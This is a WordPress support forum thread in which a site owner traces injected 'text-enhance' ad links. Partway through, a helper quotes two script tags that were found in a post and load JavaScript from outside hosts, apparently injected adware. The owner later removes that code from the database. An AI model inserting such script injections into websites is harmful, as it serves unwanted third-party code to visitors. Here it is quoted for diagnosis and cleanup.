• I had text inhance get into my FF on my windows machine in the past, and I removed it by removing the add-on…

    Now on my linux machine, it is showing text-enhance links, and it only goes away when I disable shockwave FF extension, because it uses shockwave to display the links I guess.

    I downloaded a brand new install of chrome and it shows the links with no extensions or addons, which makes me think it has to be coming directly from my site via a plugin or something, or maybe it was hacked?

    my site is https://www.radbrains.com any help would be appreciated…

Viewing 15 replies - 1 through 15 (of 24 total)
  • Thread Starter deltaskelta

    (@deltaskelta)

    also another reason why I think it is coming from somewhere within mt wordpress site is that last time it hapenned, it was on my phpbb powered forum too.

    This time my forum is unaffected, and the links only appear on the main site.

    Thread Starter deltaskelta

    (@deltaskelta)

    Ok it is now on all browsers on my windows machine as well. Note that I have not installed anything new on the machines at all. It has to be coming from inside wordpress somewhere, but how do I chase it down?

    I cruised around your site – I see no links, other than ones you put there (internal, obvious links)

    However, looking at your source code – you have various credit links in there – you may have hidden them, or they may be hidden from you. If you have inserted spam in your footer, it makes me question where you got the theme from?

    If you have a shady theme, it could be inserting all sorts of garbage

    Thread Starter deltaskelta

    (@deltaskelta)

    ok, I have just tried changing the theme to completely legitimate ones which came with wordpress and ones that were downloaded direct from wordpress themes. They both are still showing the text enhance links for me.

    I have also confirmed the text enhance links on another windows machine, a clean install on another linux machine, and booting from the linux CD (IE factory fresh no possible tampering OS) and all of them are showing the text enhance links. So 4 machines, and one CD bootable clean OS.

    Problem lies with template: nope, have tried many different legitimate templates

    Problem lies with machine: next to impossible, have tried 4 different machines, and clean OS’s

    I am pretty sure the problem is coming from a WP plugin from a recent update, will test around and get back. In the meantime anyone with any input on this?

    Thread Starter deltaskelta

    (@deltaskelta)

    no luck. I am running out of ideas, I don’t know why all my machines would be showing it

    I’m not seeing the links unfortunately – maybe someone else can see them… I just revisited your site, still nothing

    I didn’t even see anything in your source really, other than the hidden footer links I previously mentioned – those wouldn’t specifically cause your problem.

    The only thing I see that I can’t account for in your source is this… do you know what it is?

    <p><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="https://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script></p>

    It shows up in your Why Trade Price Action post, after the content but before the ‘read more’ in your source code

    I can’t see it outputting anything into your page – and it’s not on every post – that’s why I was wondering if you put it in that post?

    Thread Starter deltaskelta

    (@deltaskelta)

    thanks for the reply.

    No I do not know what that is, and i definitely did not put it in there.

    I went to the html part of that post and could not find it in the wordpress backend, which menas something else is putting it in there…

    How can I go about telling what this is and possibly removing it if I have no idea where it is coming from?

    Thread Starter deltaskelta

    (@deltaskelta)

    UPDATE: talking to my host support, they saw the links as well, and they are looking into the issue for now. Will update if I get more information

    Well, I’m glad we could point you in the right direction, at least.

    It is very hard, for me only being able to see your source code, to know where any of that comes from.

    Maybe a plugin, maybe a theme…. but I’d start to get suspicious of a hacked install – in which case:

    You need to start working your way through these resources:
    https://codex.www.ads-software.com/FAQ_My_site_was_hacked
    https://www.ads-software.com/support/topic/268083#post-1065779
    https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    https://ottopress.com/2009/hacked-wordpress-backdoors/

    Additional Resources:
    https://sitecheck.sucuri.net/scanner/
    https://www.unmaskparasites.com/
    https://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html

    Hopefully that can help you out! Although:
    https://sitecheck.sucuri.net/results/www.radbrains.com/
    Your site is coming up clean at the moment – have you figured out the problem?

    Thread Starter deltaskelta

    (@deltaskelta)

    I have not figured out the problem, and it has actually gotten worse. I never looked anywhere but the main page of my site, and I just recently tried to click a category and noticed it led me to a 404. Every internal link on the site I have clicked has led me to a 404.

    I guess that would explain the drop-off in traffic I have seen.

    My god I just want to solve this, but I now have no clue what to do, my host will not do anything about it. I have deleted all of my templates and that has not helped.

    I am thinking about doing a new clean WP install and reusing my DB and media folder. That should solve the problem right? Is this easy to do?

    Thread Starter deltaskelta

    (@deltaskelta)

    I am fairly certain it is coming from these scripts:

    https://loading-resource.com/data.geo.php?callback=window.__geo.getData
    https://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862

    but I have no way of tracking it down

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    I have not figured out the problem, and it has actually gotten worse.

    Have you checked your site to see if you’re hacked as the right Rev. Voodoo suggested? If it’s not a plugin, not your theme, you’ve likely been hacked.

    Thread Starter deltaskelta

    (@deltaskelta)

    I think it is probably a theme or a plugin that made a change to the DB and then stayed once it was deactivated. I had downloaded a lot of themes from different places to try them out without knowing the dangers. Now they are all deleted.

    I did have a small victory, I searched the DB and found the above mentioned code in the posts table, and deleted it. I do not know why it was not showing up in WP backend. This did remove the ads, but I am still left with the 404 problem.

    I did check the websites above and I did some snooping in my DB and filesystem and didn’t find anything unusual, although I may have missed something unknowingly. I did clean up all unneeded DB tables, all unneeded plugins, and templates. I also checked the uploads folder and the wp-config for anything suspicious and again didn’t find anything.

    I did, however notice that my .htaccess file was renamed to .htaccess123 but I do not know if this is something my host has done while they were looking at my site or if this may be the cause of the problem.

    Thanks for your help, what would cause 404’s like that when the data clearly still exists?

    Thread Starter deltaskelta

    (@deltaskelta)

    renaming the .htaccess file fixed the problem. I am sure it must have been my host who renamed it while troubleshooting for some reason, maybe to see if the source of the problem was there, renaming to see if it solved the problem…and then like a noob he left it renamed.

    Anyway all seems to be going well for now, I hope it stays fixed.

    Thread Starter deltaskelta

    (@deltaskelta)

    htaccess123 was the problem, I suspect it was some tech guy at my host who renamed it to see if that was the source of the problem and then never “un-named” it back to just .htaccess.

    At least now everything seems to be working, and it was actually really simple to fix in the DB, but I had just never messed around with databases before so it was a little unnerving.

    I hope I have caught everything and it all goes smoothly from here.

    Edit: It could have been any number of themes I had installed, but the theme that I really want to use is called newslayer from FThemes.com. Is that website reputable enough to use themes from?

Viewing 15 replies - 1 through 15 (of 24 total)
  • The topic ‘wordpress plugin showing text-enhance links?’ is closed to new replies.